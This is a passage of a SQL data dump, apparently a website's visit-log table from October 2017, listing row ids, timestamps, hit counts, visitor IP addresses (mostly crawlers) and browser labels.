67997,6,6,0,0,'46.229.168.68','other'),(167037,1508168056,3,3,0,0,'46.229.168.79','other'),(167038,1508168076,1,1,0,0,'178.154.171.56','other'),(167039,1508168129,5,5,0,0,'46.229.168.69','other'),(167040,1508168193,7,7,0,0,'46.229.168.66','other'),(167041,1508168302,4,4,0,0,'46.229.168.72','other'),(167042,1508168316,1,1,0,0,'217.69.133.9','other'),(167043,1508168320,1,1,0,0,'217.69.133.3','other'),(167044,1508168455,2,1,1,0,'66.249.70.25',''),(167045,1508168494,9,9,0,0,'46.229.168.73','other'),(167046,1508168532,1,1,0,0,'66.102.9.25','chrome'),(167047,1508168672,1,1,0,0,'217.182.132.240','other'),(167048,1508168696,1,1,0,0,'95.132.13.5','chrome'),(167049,1508168735,1,1,0,0,'217.182.132.175','other'),(167050,1508168749,6,6,0,0,'46.229.168.78','other'),(167051,1508168764,8,8,0,0,'46.229.168.75','other'),(167052,1508168786,5,5,0,0,'46.229.168.70','other'),(167053,1508168875,1,1,0,0,'217.182.132.36','other'),(167054,1508168915,6,6,0,0,'46.229.168.67','other'),(167055,1508168919,3,3,0,0,'46.229.168.77','other'),(167056,1508168964,6,6,0,0,'46.229.168.65','other'),(167057,1508168998,2,2,0,0,'46.229.168.80','other'),(167058,1508169014,3,3,0,0,'46.229.168.74','other'),(167059,1508169040,4,4,0,0,'46.229.168.68','other'),(167060,1508169100,1,1,0,0,'46.229.168.66','other'),(167061,1508169221,5,5,0,0,'46.229.168.72','other'),(167062,1508169351,1,1,0,0,'178.92.250.67','chrome'),(167063,1508169466,3,3,0,0,'46.229.168.76','other'),(167064,1508169476,1,1,0,0,'217.182.132.187','other'),(167065,1508169511,1,1,0,0,'141.8.132.22','other'),(167066,1508169515,1,1,0,0,'178.154.171.81','other'),(167067,1508169561,7,7,0,0,'46.229.168.71','other'),(167068,1508169594,5,5,0,0,'46.229.168.73','other'),(167069,1508169618,2,1,1,0,'66.249.70.27',''),(167070,1508169634,1,0,1,0,'66.249.64.30',''),(167071,1508169703,5,5,0,0,'46.229.168.70','other'),(167072,1508169766,4,4,0,0,'46.229.168.78','other'),(167073,1508169794,1,1,0,0,'51.255.65.6','other'),(167074,1508169829,5,5,0,0,'46.229.168.75','other'),(167075,1508169942,4,4,0,0,'46.229.168.74','other'),(167076,1508169962,1,1,0,0,'157.55.39.45','other'),(167077,1508169968,2,2,0,0,'46.229.168.79','other'),(167078,1508169972,3,3,0,0,'46.229.168.67','other'),(167079,1508169990,2,2,0,0,'46.229.168.65','other'),(167080,1508170053,2,2,0,0,'46.229.168.66','other'),(167081,1508170063,1,1,0,0,'82.145.220.103','chrome'),(167082,1508170118,6,6,0,0,'46.229.168.80','other'),(167083,1508170121,1,1,0,0,'51.255.65.75','other'),(167084,1508170172,6,6,0,0,'46.229.168.69','other'),(167085,1508170216,4,4,0,0,'46.229.168.72','other'),(167086,1508170273,1,1,0,0,'178.92.250.67','chrome'),(167087,1508170320,1,0,1,0,'66.249.70.25',''),(167088,1508170323,1,1,0,0,'82.145.220.252','chrome'),(167089,1508170395,4,4,0,0,'46.229.168.68','other'),(167090,1508170449,5,5,0,0,'46.229.168.76','other'),(167091,1508170530,6,6,0,0,'46.229.168.77','other'),(167092,1508170564,4,4,0,0,'46.229.168.73','other'),(167093,1508170635,4,4,0,0,'46.229.168.70','other'),(167094,1508170652,8,8,0,0,'46.229.168.71','other'),(167095,1508170758,7,7,0,0,'46.229.168.75','other'),(167096,1508170933,4,4,0,0,'46.229.168.78','other'),(167097,1508170940,3,3,0,0,'46.229.168.79','other'),(167098,1508171075,1,1,0,0,'51.255.71.113','other'),(167099,1508171213,3,3,0,0,'46.229.168.65','other'),(167100,1508171269,2,2,0,0,'46.229.168.67','other'),(167101,1508171330,4,4,0,0,'46.229.168.66','other'),(167102,1508171401,4,4,0,0,'46.229.168.72','other'),(167103,1508171433,1,1,0,0,'66.249.64.28','chrome'),(167104,1508171495,3,3,0,0,'46.229.168.73','other'),(167105,1508171525,6,6,0,0,'46.229.168.76','other'),(167106,1508171562,5,5,0,0,'46.229.168.74','other'),(167107,1508171584,1,1,0,0,'46.229.168.71','other'),(167108,1508171613,1,1,0,0,'217.182.132.17','other'),(167109,1508171621,5,5,0,0,'46.229.168.80','other'),(167110,1508171642,1,1,0,0,'46.229.168.77','other'),(167111,1508171817,4,4,0,0,'46.229.168.69','other'),(167112,1508171859,2,2,0,0,'91.196.178.35','chrome'),(167113,1508171871,3,3,0,0,'46.229.168.75','other'),(167114,1508172035,4,4,0,0,'46.229.168.78','other'),(167115,1508172058,1,1,0,0,'46.229.168.79','other'),(167116,1508172151,1,1,0,0,'51.255.65.48','other'),(167117,1508172303,1,0,1,0,'66.249.70.29',''),(167118,1508172555,1,0,1,0,'66.249.64.28',''),(167119,1508172579,1,1,0,0,'178.92.250.67','chrome'),(167120,1508172873,1,1,0,0,'164.132.162.154','other'),(167121,1508172984,1,1,0,0,'82.145.221.249','chrome'),(167122,1508173033,1,1,0,0,'87.250.224.125','other'),(167123,1508173118,1,1,0,0,'66.249.70.29','chrome'),(167124,1508173419,1,1,0,0,'207.46.13.143','other'),(167125,1508173528,1,1,0,0,'40.77.167.68','other'),(167126,1508173602,1,1,0,0,'51.255.65.35','other'),(167127,1508173604,1,1,0,0,'217.182.132.174','other'),(167128,1508173658,1,0,1,0,'66.249.64.28',''),(167129,1508173867,1,1,0,0,'66.249.64.28','chrome'),(167130,1508173895,2,1,1,0,'66.249.70.27',''),(167131,1508174298,1,1,0,0,'217.69.133.5','other'),(167132,1508174811,1,1,0,0,'176.98.5.93','chrome'),(167133,1508175227,1,1,0,0,'51.255.65.16','other'),(167134,1508175522,1,1,0,0,'217.182.132.60','other'),(167135,1508175770,1,1,0,0,'217.182.132.241','other'),(167136,1508175786,1,1,0,0,'51.255.65.68','other'),(167137,1508176140,1,1,0,0,'217.182.132.153','other'),(167138,1508176252,1,1,0,0,'137.74.207.110','other'),(167139,1508176311,1,1,0,0,'8.29.198.25','other'),(167140,1508176520,1,1,0,0,'91.209.11.236','other'),(167141,1508176692,1,1,0,0,'66.249.64.29','chrome'),(167142,1508176849,1,1,0,0,'66.249.64.30','chrome'),(167143,1508177400,1,1,0,0,'217.182.132.61','other'),(167144,1508177642,1,1,0,0,'217.182.132.174','other'),(167145,1508177772,2,2,0,0,'91.209.11.236','other'),(167146,1508177803,1,1,0,0,'51.255.65.68','other'),(167147,1508177964,1,1,0,0,'217.182.132.77','other'),(167148,1508177992,1,0,1,0,'68.180.229.52',''),(167149,1508178229,1,1,0,0,'51.255.65.64','other'),(167150,1508178273,1,1,0,0,'51.255.65.59','other'),(167151,1508178332,1,1,0,0,'91.196.178.163','chrome'),(167152,1508178422,1,1,0,0,'82.145.222.118','chrome'),(167153,1508178471,1,1,0,0,'178.92.250.67','chrome'),(167154,1508178671,2,2,0,0,'54.165.59.7','other'),(167155,1508178805,1,0,1,0,'66.249.70.27',''),(167156,1508178850,1,1,0,0,'87.250.224.46','other'),(167157,1508179164,2,2,0,0,'217.182.132.191','other'),(167158,1508179187,1,1,0,0,'82.145.221.127','chrome'),(167159,1508179219,2,2,0,0,'91.209.11.236','other'),(167160,1508179419,1,1,0,0,'157.55.39.7','other'),(167161,1508179614,1,1,0,0,'217.182.132.193','other'),(167162,1508179636,1,0,1,0,'66.249.64.30',''),(167163,1508179847,1,1,0,0,'217.69.133.203','other'),(167164,1508180001,1,1,0,0,'164.132.162.153','other'),(167165,1508180084,1,1,0,0,'217.182.132.72','other'),(167166,1508180694,1,1,0,0,'217.182.132.80','other'),(167167,1508180801,1,1,0,0,'217.182.132.88','other'),(167168,1508180947,1,1,0,0,'66.249.64.28','chrome'),(167169,1508180951,1,1,0,0,'66.249.70.29','chrome'),(167170,1508180955,1,0,1,0,'66.249.70.27',''),(167171,1508180980,1,1,0,0,'178.92.250.67','firefox'),(167172,1508181232,1,1,0,0,'217.182.132.93','other'),(167173,1508181308,1,1,0,0,'137.74.207.109','other'),(167174,1508181340,1,1,0,0,'78.111.186.77','chrome'),(167175,1508181555,1,1,0,0,'157.55.39.7','other'),(167176,1508181728,1,1,0,0,'91.209.11.236','other'),(167177,1508181742,1,1,0,0,'51.255.71.123','other'),(167178,1508181807,1,1,0,0,'82.193.100.107','other'),(167179,1508182105,1,1,0,0,'91.196.178.102','chrome'),(167180,1508182433,1,1,0,0,'51.255.71.112','other'),(167181,1508182560,1,1,0,0,'217.182.132.240','other'),(167182,1508182571,1,1,0,0,'66.249.64.29','chrome'),(167183,1508183016,1,1,0,0,'178.92.250.67','chrome'),(167184,1508183148,1,1,0,0,'91.209.11.236','other'),(167185,1508183275,1,1,0,0,'91.209.51.22','other'),(167186,1508183875,1,1,0,0,'217.182.132.178','other'),(167187,1508184445,1,1,0,0,'91.196.178.136','chrome'),(167188,1508184740,1,1,0,0,'51.255.65.61','other'),(167189,1508184986,1,0,1,0,'66.249.64.29',''),(167190,1508185145,1,1,0,0,'51.255.65.46','other'),(167191,1508185839,1,1,0,0,'66.249.64.30','chrome'),(167192,1508186514,1,1,0,0,'51.255.65.50','other'),(167193,1508186728,1,1,0,0,'66.249.64.28','chrome'),(167194,1508186732,1,1,0,0,'66.249.70.27','chrome'),(167195,1508186770,1,0,1,0,'66.249.70.25',''),(167196,1508187147,1,1,0,0,'8.29.198.27','other'),(167197,1508187301,1,1,0,0,'164.132.162.160','other'),(167198,1508187504,1,1,0,0,'157.55.39.7','other'),(167199,1508187583,1,1,0,0,'164.132.162.154','other'),(167200,1508187610,1,1,0,0,'217.182.132.174','other'),(167201,1508187735,1,1,0,0,'40.77.167.68','other'),(167202,1508187854,1,1,0,0,'37.73.215.51','chrome'),(167203,1508187860,1,1,0,0,'164.132.162.188','other'),(167204,1508187995,2,2,0,0,'51.255.65.84','other'),(167205,1508188086,1,1,0,0,'51.255.65.74','other'),(167206,1508188191,1,1,0,0,'51.255.65.8','other'),(167207,1508188284,1,1,0,0,'207.46.13.143','other'),(167208,1508188451,1,1,0,0,'51.255.65.78','other'),(167209,1508188680,1,1,0,0,'51.255.65.14','other'),(167210,1508189037,1,0,1,0,'66.249.70.25',''),(167211,1508189064,1,1,0,0,'51.255.65.11','other'),(167212,1508189299,1,1,0,0,'91.209.11.236','other'),(167213,1508189988,1,1,0,0,'207.46.13.143','other'),(167214,1508190265,1,0,1,0,'66.249.64.30',''),(167215,1508190615,1,1,0,0,'51.255.65.50','other'),(167216,1508191224,2,2,0,0,'217.69.133.6','other'),(167217,1508191329,1,1,0,0,'51.255.65.16','other'),(167218,1508191587,1,1,0,0,'217.182.132.22','other'),(167219,1508191821,1,1,0,0,'217.182.132.190','other'),(167220,1508192375,1,1,0,0,'66.249.64.29','chrome'),(167221,1508192401,1,0,1,0,'66.249.70.27',''),(167222,1508192411,1,1,0,0,'66.249.70.25','chrome'),(167223,1508192571,1,1,0,0,'217.182.132.31','other'),(167224,1508192640,1,1,0,0,'217.182.132.69','other'),(167225,1508192739,1,1,0,0,'51.255.65.80','other'),(167226,1508193140,1,1,0,0,'66.249.64.30','chrome'),(167227,1508193385,1,1,0,0,'217.182.132.67','other'),(167228,1508193435,1,1,0,0,'51.255.65.11','other'),(167229,1508193534,1,1,0,0,'82.193.115.183','chrome'),(167230,1508194070,1,1,0,0,'54.165.59.7','other'),(167231,1508194237,1,1,0,0,'51.255.65.34','other'),(167232,1508194453,1,1,0,0,'137.74.207.109','other'),(167233,1508194748,1,1,0,0,'51.255.65.62','other'),(167234,1508195112,1,0,1,0,'66.249.64.28',''),(167235,1508195398,1,1,0,0,'164.132.162.164','other'),(167236,1508195402,1,1,0,0,'51.255.65.63','other'),(167237,1508195441,1,1,0,0,'217.182.132.190','other'),(167238,1508195900,1,1,0,0,'51.255.65.5','other'),(167239,1508196287,2,0,2,0,'66.249.70.29',''),(167240,1508196311,2,0,2,0,'66.249.64.29',''),(167241,1508196457,1,1,0,0,'51.255.65.39','other'),(167242,1508196723,1,1,0,0,'51.255.65.80','other'),(167243,1508196858,1,1,0,0,'51.255.71.115','other'),(167244,1508197034,1,1,0,0,'217.182.132.32','other'),(167245,1508197506,1,1,0,0,'217.182.132.63','other'),(167246,1508197507,1,1,0,0,'51.255.65.95','other'),(167247,1508197591,1,1,0,0,'217.182.132.73','other'),(167248,1508197939,1,1,0,0,'216.244.66.237','other'),(167249,1508197977,1,1,0,0,'8.29.198.25','other'),(167250,1508198247,1,1,0,0,'164.132.162.153','other'),(167251,1508198435,1,1,0,0,'51.255.65.9','other'),(167252,1508198452,1,1,0,0,'51.255.65.43','other'),(167253,1508198457,1,1,0,0,'66.249.64.28','chrome'),(167254,1508198466,1,1,0,0,'66.249.70.25','chrome'),(167255,1508199197,1,1,0,0,'217.182.132.32','other'),(167256,1508199229,1,1,0,0,'217.182.132.68','other'),(167257,1508199774,1,1,0,0,'51.255.65.70','other'),(167258,1508199805,1,1,0,0,'137.74.201.99','other'),(167259,1508200748,1,1,0,0,'207.46.13.143','other'),(167260,1508201095,1,1,0,0,'217.182.132.148','other'),(167261,1508201128,1,1,0,0,'217.69.133.85','other'),(167262,1508201654,1,1,0,0,'51.255.65.79','other'),(167263,1508201822,1,1,0,0,'51.255.71.117','other'),(167264,1508201964,1,1,0,0,'217.182.132.61','other'),(167265,1508202743,1,1,0,0,'198.37.118.38','firefox'),(167266,1508202753,1,1,0,0,'51.255.65.55','other'),(167267,1508203011,2,2,0,0,'217.182.132.85','other'),(167268,1508203388,1,1,0,0,'217.182.132.65','other'),(167269,1508203440,1,1,0,0,'37.9.113.101','other'),(167270,1508203456,1,1,0,0,'51.255.71.125','other'),(167271,1508203552,1,1,0,0,'82.145.221.242','chrome'),(167272,1508204558,1,1,0,0,'51.255.65.13','other'),(167273,1508204976,1,1,0,0,'217.182.132.150','other'),(167274,1508205355,71,71,0,0,'23.237.4.26','other'),(167275,1508206202,1,1,0,0,'51.255.65.49','other'),(167276,1508206443,1,1,0,0,'217.182.132.180','other'),(167277,1508206854,1,1,0,0,'66.249.64.28','chrome'),(167278,1508206861,2,1,1,0,'66.249.70.25',''),(167279,1508207711,1,1,0,0,'178.154.171.81','other'),(167280,1508208012,1,1,0,0,'164.132.162.158','other'),(167281,1508208249,1,1,0,0,'217.182.132.23','other'),(167282,1508208304,1,1,0,0,'51.255.65.84','other'),(167283,1508208401,1,1,0,0,'217.69.133.9','other'),(167284,1508208403,1,1,0,0,'217.69.133.4','other'),(167285,1508208683,1,1,0,0,'51.255.65.8','other'),(167286,1508208812,1,1,0,0,'8.29.198.26','other'),(167287,1508209020,1,1,0,0,'51.255.65.23','other'),(167288,1508209243,1,1,0,0,'217.182.132.176','other'),(167289,1508209311,1,1,0,0,'217.182.132.56','other'),(167290,1508209752,1,1,0,0,'51.255.65.58','other'),(167291,1508211118,1,0,1,0,'68.180.229.52',''),(167292,1508212111,1,0,1,0,'66.249.70.25',''),(167293,1508212114,1,0,1,0,'66.249.70.29',''),(167294,1508212119,1,0,1,0,'66.249.70.27',''),(167295,1508213155,1,1,0,0,'217.182.132.60','other'),(167296,1508213365,1,1,0,0,'51.255.65.60','other'),(167297,1508213538,1,1,0,0,'66.249.64.30','chrome'),(167298,1508213636,1,1,0,0,'137.74.207.170','other'),(167299,1508214460,1,1,0,0,'217.182.132.87','other'),(167300,1508214735,1,1,0,0,'217.182.132.92','other'),(167301,1508215141,1,1,0,0,'51.255.65.25','other'),(167302,1508215245,1,1,0,0,'198.37.118.38','firefox'),(167303,1508215257,1,1,0,0,'87.250.224.46','other'),(167304,1508215697,1,1,0,0,'217.182.132.27','other'),(167305,1508216151,1,1,0,0,'217.182.132.181','other'),(167306,1508216168,1,1,0,0,'217.182.132.35','other'),(167307,1508216238,1,1,0,0,'217.182.132.52','other'),(167308,1508216751,1,0,1,0,'66.249.64.30',''),(167309,1508216804,1,1,0,0,'217.182.132.179','other'),(167310,1508217013,1,1,0,0,'217.182.132.150','other'),(167311,1508217352,1,1,0,0,'91.196.178.72','chrome'),(167312,1508217460,1,1,0,0,'51.255.65.96','other'),(167313,1508217697,1,0,1,0,'66.249.64.30',''),(167314,1508217760,1,1,0,0,'217.182.132.77','other'),(167315,1508218198,1,1,0,0,'91.196.178.70','chrome'),(167316,1508218430,1,1,0,0,'141.8.142.74','other'),(167317,1508218458,1,1,0,0,'217.182.132.69','other'),(167318,1508218762,1,1,0,0,'51.255.65.82','other'),(167319,1508218844,50,50,0,0,'142.4.200.37','other'),(167320,1508218889,1,1,0,0,'51.255.71.115','other'),(167321,1508219338,1,1,0,0,'51.255.65.52','other'),(167322,1508219493,1,1,0,0,'194.50.254.169','chrome'),(167323,1508219635,1,1,0,0,'8.29.198.25','other'),(167324,1508219680,1,1,0,0,'51.255.71.116','other'),(167325,1508219730,2,2,0,0,'66.249.70.25','chrome'),(167326,1508219743,1,1,0,0,'51.255.65.85','other'),(167327,1508219847,1,1,0,0,'51.255.65.86','other'),(167328,1508219925,1,1,0,0,'91.196.178.161','chrome'),(167329,1508220329,1,1,0,0,'51.255.71.118','other'),(167330,1508220332,1,1,0,0,'217.69.133.6','other'),(167331,1508220352,1,1,0,0,'217.69.133.9','other'),(167332,1508220365,1,1,0,0,'217.69.133.5','other'),(167333,1508220592,1,1,0,0,'194.50.254.169','chrome'),(167334,1508220732,2,2,0,0,'91.196.178.70','chrome'),(167335,1508220786,1,1,0,0,'217.182.132.61','other'),(167336,1508220788,1,0,1,0,'66.249.70.27',''),(167337,1508221134,1,1,0,0,'51.255.65.25','other'),(167338,1508221313,1,1,0,0,'137.74.207.114','other'),(167339,1508221530,1,1,0,0,'91.209.11.236','other'),(167340,1508221682,2,2,0,0,'216.244.66.237','other'),(167341,1508221700,1,1,0,0,'46.48.13.161','chrome'),(167342,1508221772,2,2,0,0,'217.182.132.147','other'),(167343,1508222176,1,1,0,0,'91.196.178.165','chrome'),(167344,1508222303,1,1,0,0,'51.255.65.57','other'),(167345,1508222350,1,1,0,0,'217.182.132.181','other'),(167346,1508222386,1,1,0,0,'91.196.178.70','chrome'),(167347,1508222453,1,1,0,0,'185.30.202.105','chrome'),(167348,1508222763,1,1,0,0,'157.55.39.7','other'),(167349,1508222915,1,1,0,0,'51.255.65.32','other'),(167350,1508223108,1,1,0,0,'51.255.65.52','other'),(167351,1508223252,1,1,0,0,'51.255.65.55','other'),(167352,1508223700,1,1,0,0,'51.255.65.46','other'),(167353,1508224091,1,1,0,0,'91.196.178.70','chrome'),(167354,1508224152,1,1,0,0,'217.182.132.96','other'),(167355,1508224250,1,1,0,0,'185.89.251.35','chrome'),(167356,1508224462,1,1,0,0,'66.249.70.25','chrome'),(167357,1508224649,1,1,0,0,'217.182.132.75','other'),(167358,1508224856,1,1,0,0,'217.182.132.71','other'),(167359,1508225038,2,2,0,0,'91.209.11.236','other'),(167360,1508225076,1,1,0,0,'66.249.70.29','chrome'),(167361,1508225431,1,1,0,0,'217.69.133.3','other'),(167362,1508225606,1,1,0,0,'51.255.65.15','other'),(167363,1508225731,1,0,1,0,'66.249.64.12',''),(167364,1508226017,1,1,0,0,'217.182.132.148','other'),(167365,1508226301,1,1,0,0,'217.182.132.69','other'),(167366,1508226550,1,1,0,0,'91.196.178.70','chrome'),(167367,1508226835,1,1,0,0,'91.196.178.69','chrome'),(167368,1508227265,1,1,0,0,'217.182.132.156','other'),(167369,1508227502,1,1,0,0,'91.196.178.67','chrome'),(167370,1508227690,1,1,0,0,'95.132.77.16','firefox'),(167371,1508228032,1,1,0,0,'46.48.13.161','chrome'),(167372,1508228267,1,1,0,0,'91.196.178.69','chrome'),(167373,1508228634,1,1,0,0,'137.74.207.164','other'),(167374,1508229080,1,1,0,0,'51.255.65.71','other'),(167375,1508229110,25,25,0,0,'69.30.234.2','other'),(167376,1508229228,1,1,0,0,'107.167.109.166','chrome'),(167377,1508229237,1,1,0,0,'217.182.132.7','other'),(167378,1508229690,1,1,0,0,'51.255.71.119','other'),(167379,1508229703,1,1,0,0,'91.235.200.73','chrome'),(167380,1508229778,1,1,0,0,'66.249.64.10','chrome'),(167381,1508229796,1,1,0,0,'66.249.70.27','chrome'),(167382,1508230364,2,2,0,0,'217.182.132.191','other'),(167383,1508230476,1,1,0,0,'8.29.198.27','other'),(167384,1508230553,1,1,0,0,'95.133.61.102','chrome'),(167385,1508230892,1,1,0,0,'141.8.142.74','other'),(167386,1508230947,1,1,0,0,'178.154.171.88','other'),(167387,1508230966,1,1,0,0,'51.255.65.15','other'),(167388,1508230990,1,1,0,0,'217.69.133.4','other'),(167389,1508231237,1,1,0,0,'217.182.132.23','other'),(167390,1508231357,1,0,1,0,'66.249.64.8',''),(167391,1508231438,1,1,0,0,'217.182.132.147','other'),(167392,1508232303,1,1,0,0,'180.76.15.18','other'),(167393,1508232472,1,1,0,0,'217.182.132.176','other'),(167394,1508233146,1,1,0,0,'91.196.178.130','firefox'),(167395,1508233176,15,15,0,0,'144.76.38.73','other'),(167396,1508233396,1,1,0,0,'51.255.65.66','other'),(167397,1508233541,1,1,0,0,'91.196.178.69','chrome'),(167398,1508233645,1,0,1,0,'66.249.70.25',''),(167399,1508233713,1,1,0,0,'107.167.108.185','chrome'),(167400,1508233864,1,1,0,0,'217.182.132.65','other'),(167401,1508234443,1,1,0,0,'217.182.132.180','other'),(167402,1508234468,7,7,0,0,'144.76.38.73','other'),(167403,1508234623,1,1,0,0,'91.196.178.69','chrome'),(167404,1508234736,1,1,0,0,'173.252.88.95','other'),(167405,1508235072,1,1,0,0,'46.201.174.167','chrome'),(167406,1508235126,1,1,0,0,'51.255.65.12','other'),(167407,1508236632,1,0,1,0,'66.249.70.25',''),(167408,1508236849,1,1,0,0,'91.196.178.68','chrome'),(167409,1508237333,1,1,0,0,'51.255.65.84','other'),(167410,1508238017,1,1,0,0,'188.166.79.230','chrome'),(167411,1508238068,1,1,0,0,'91.196.178.167','chrome'),(167412,1508238161,1,1,0,0,'194.1.195.225','chrome'),(167413,1508238318,1,1,0,0,'173.208.228.146','other'),(167414,1508238385,1,1,0,0,'157.55.39.7','other'),(167415,1508238416,1,1,0,0,'51.255.65.25','other'),(167416,1508238521,1,1,0,0,'95.132.19.111','firefox'),(167417,1508238566,1,1,0,0,'66.102.9.25','chrome'),(167418,1508238583,1,1,0,0,'51.255.65.32','other'),(167419,1508238598,1,1,0,0,'91.196.177.46','chrome'),(167420,1508238686,1,1,0,0,'217.182.132.96','other'),(167421,1508238693,1,1,0,0,'217.182.132.28','other'),(167422,1508238721,1,1,0,0,'217.182.132.182','other'),(167423,1508238734,1,1,0,0,'178.92.250.27','chrome'),(167424,1508238867,1,0,1,0,'66.249.64.10',''),(167425,1508238955,1,1,0,0,'91.196.178.70','chrome'),(167426,1508238966,1,1,0,0,'37.53.126.67','chrome'),(167427,1508239051,1,0,1,0,'68.180.229.52',''),(167428,1508239082,1,1,0,0,'217.182.132.59','other'),(167429,1508239997,1,1,0,0,'51.255.65.97','other'),(167430,1508240006,1,1,0,0,'92.113.175.174','chrome'),(167431,1508240043,1,1,0,0,'51.255.65.4','other'),(167432,1508240114,1,1,0,0,'217.182.132.33','other'),(167433,1508240202,1,1,0,0,'217.182.132.15','other'),(167434,1508240688,1,1,0,0,'217.182.132.172','other'),(167435,1508240726,1,1,0,0,'180.76.15.24','other'),(167436,1508241078,1,1,0,0,'51.255.71.115','other'),(167437,1508241304,1,1,0,0,'217.182.132.53','other'),(167438,1508241312,1,1,0,0,'8.29.198.27','other'),(167439,1508241367,1,1,0,0,'217.182.132.78','other'),(167440,1508241611,1,1,0,0,'46.201.241.60','chrome'),(167441,1508241996,1,1,0,0,'137.74.201.108','other'),(167442,1508242284,1,1,0,0,'217.69.133.194','other'),(167443,1508242309,1,1,0,0,'51.255.65.52','other'),(167444,1508242588,1,1,0,0,'164.132.162.153','other'),(167445,1508242596,1,1,0,0,'162.210.196.97','other'),(167446,1508242731,1,1,0,0,'217.182.132.192','other'),(167447,1508243059,1,1,0,0,'217.182.132.29','other'),(167448,1508243287,1,1,0,0,'176.37.100.253','chrome'),(167449,1508243600,1,1,0,0,'66.249.93.205','chrome'),(167450,1508243668,1,1,0,0,'107.167.109.166','chrome'),(167451,1508243903,1,1,0,0,'164.132.162.156','other'),(167452,1508243941,1,1,0,0,'51.255.65.6','other'),(167453,1508244167,1,1,0,0,'51.255.65.52','other'),(167454,1508244319,1,1,0,0,'178.94.245.168','chrome'),(167455,1508244402,1,1,0,0,'217.182.132.182','other'),(167456,1508245297,2,2,0,0,'157.55.39.70','other'),(167457,1508245519,1,1,0,0,'51.255.65.47','other'),(167458,1508245602,1,0,1,0,'66.249.70.29',''),(167459,1508245679,1,1,0,0,'164.132.162.153','other'),(167460,1508245704,1,0,1,0,'66.249.64.12',''),(167461,1508245748,1,1,0,0,'91.196.178.67','chrome'),(167462,1508246057,1,1,0,0,'31.184.197.6','chrome'),(167463,1508246157,1,1,0,0,'91.196.178.70','chrome'),(167464,1508246200,1,1,0,0,'51.255.65.86','other'),(167465,1508246596,1,1,0,0,'178.154.171.88','other'),(167466,1508246619,1,1,0,0,'137.74.207.102','other'),(167467,1508247105,1,1,0,0,'46.211.119.57','chrome'),(167468,1508247217,1,1,0,0,'51.255.65.61','other'),(167469,1508247280,1,1,0,0,'217.182.132.95','other'),(167470,1508247731,1,1,0,0,'45.79.198.115','chrome'),(167471,1508247761,1,1,0,0,'204.85.191.30','opera'),(167472,1508247768,1,1,0,0,'91.196.178.35','chrome'),(167473,1508247769,1,1,0,0,'173.208.153.75','firefox'),(167474,1508247774,1,1,0,0,'51.255.65.80','other'),(167475,1508247800,1,1,0,0,'199.87.154.255','other'),(167476,1508247921,1,1,0,0,'137.74.207.108','other'),(167477,1508248004,1,1,0,0,'217.69.133.9','other'),(167478,1508248444,1,1,0,0,'217.182.132.56','other'),(167479,1508248695,1,1,0,0,'91.196.178.69','firefox'),(167480,1508248715,1,1,0,0,'51.255.71.123','other'),(167481,1508248932,1,1,0,0,'51.255.65.27','other'),(167482,1508248974,1,0,1,0,'66.249.64.10',''),(167483,1508249092,1,1,0,0,'51.255.65.26','other'),(167484,1508249223,1,1,0,0,'51.255.65.31','other'),(167485,1508249274,1,1,0,0,'164.132.162.156','other'),(167486,1508249750,1,1,0,0,'91.196.178.70','chrome'),(167487,1508250082,1,1,0,0,'178.92.75.249','chrome'),(167488,1508250274,1,1,0,0,'51.255.65.97','other'),(167489,1508250703,1,1,0,0,'137.74.201.108','other'),(167490,1508251080,1,1,0,0,'217.182.132.81','other'),(167491,1508251270,1,0,1,0,'66.249.64.8',''),(167492,1508251413,1,0,1,0,'66.249.70.27',''),(167493,1508251457,1,1,0,0,'107.167.108.75','chrome'),(167494,1508251502,1,1,0,0,'51.255.71.118','other'),(167495,1508251754,1,1,0,0,'51.255.71.98','other'),(167496,1508251830,1,1,0,0,'51.255.65.62','other'),(167497,1508251844,2,2,0,0,'31.43.10.28','firefox'),(167498,1508252134,1,1,0,0,'8.29.198.27','other'),(167499,1508252652,1,1,0,0,'51.255.65.22','other'),(167500,1508253262,1,1,0,0,'107.167.109.167','chrome'),(167501,1508253491,1,1,0,0,'87.250.224.46','other'),(167502,1508253504,1,1,0,0,'141.8.142.74','other'),(167503,1508253781,1,1,0,0,'51.255.65.65','other'),(167504,1508253962,1,1,0,0,'217.182.132.177','other'),(167505,1508254116,1,1,0,0,'217.182.132.185','other'),(167506,1508254713,7,7,0,0,'91.196.178.99','chrome'),(167507,1508254798,1,1,0,0,'178.93.148.19','chrome'),(167508,1508255079,1,1,0,0,'178.154.171.88','other'),(167509,1508255673,1,1,0,0,'130.180.211.139','chrome'),(167510,1508255790,1,1,0,0,'66.249.70.29','chrome'),(167511,1508256192,1,1,0,0,'51.255.71.110','other'),(167512,1508256228,2,2,0,0,'164.132.162.156','other'),(167513,1508256299,1,1,0,0,'51.255.71.123','other'),(167514,1508256305,1,1,0,0,'178.92.74.125','chrome'),(167515,1508256412,1,1,0,0,'51.255.65.31','other'),(167516,1508256506,2,2,0,0,'91.209.11.236','other'),(167517,1508256734,1,1,0,0,'51.255.71.114','other'),(167518,1508257314,1,1,0,0,'137.74.207.161','other'),(167519,1508257582,1,1,0,0,'164.132.164.180','other'),(167520,1508257605,1,1,0,0,'91.196.178.100','chrome'),(167521,1508257616,1,1,0,0,'51.255.71.118','other'),(167522,1508258148,1,1,0,0,'217.182.132.80','other'),(167523,1508258931,1,1,0,0,'51.255.65.22','other'),(167524,1508259101,1,1,0,0,'51.255.65.74','other'),(167525,1508259608,1,1,0,0,'141.8.142.74','other'),(167526,1508259710,1,1,0,0,'51.255.65.47','other'),(167527,1508259713,1,1,0,0,'51.255.65.11','other'),(167528,1508259868,1,1,0,0,'91.209.11.236','other'),(167529,1508260022,1,1,0,0,'82.193.115.183','chrome'),(167530,1508260073,1,1,0,0,'217.182.132.157','other'),(167531,1508260156,1,1,0,0,'216.244.66.237','other'),(167532,1508260209,1,1,0,0,'51.255.65.31','other'),(167533,1508260338,1,1,0,0,'91.124.238.76','chrome'),(167534,1508260546,1,1,0,0,'217.182.132.178','other'),(167535,1508260549,1,1,0,0,'185.182.81.134','chrome'),(167536,1508260730,1,1,0,0,'107.167.108.75','chrome'),(167537,1508260859,1,1,0,0,'91.196.178.163','chrome'),(167538,1508261342,2,2,0,0,'141.8.142.74','other'),(167539,1508261397,1,1,0,0,'213.57.40.49','other'),(167540,1508261425,1,1,0,0,'137.74.207.159','other'),(167541,1508261503,1,1,0,0,'217.182.132.86','other'),(167542,1508261847,1,1,0,0,'178.137.238.205','chrome'),(167543,1508262233,1,1,0,0,'217.182.132.5','other'),(167544,1508262343,1,1,0,0,'217.182.132.186','other'),(167545,1508262538,1,1,0,0,'217.182.132.173','other'),(167546,1508262964,1,1,0,0,'8.29.198.26',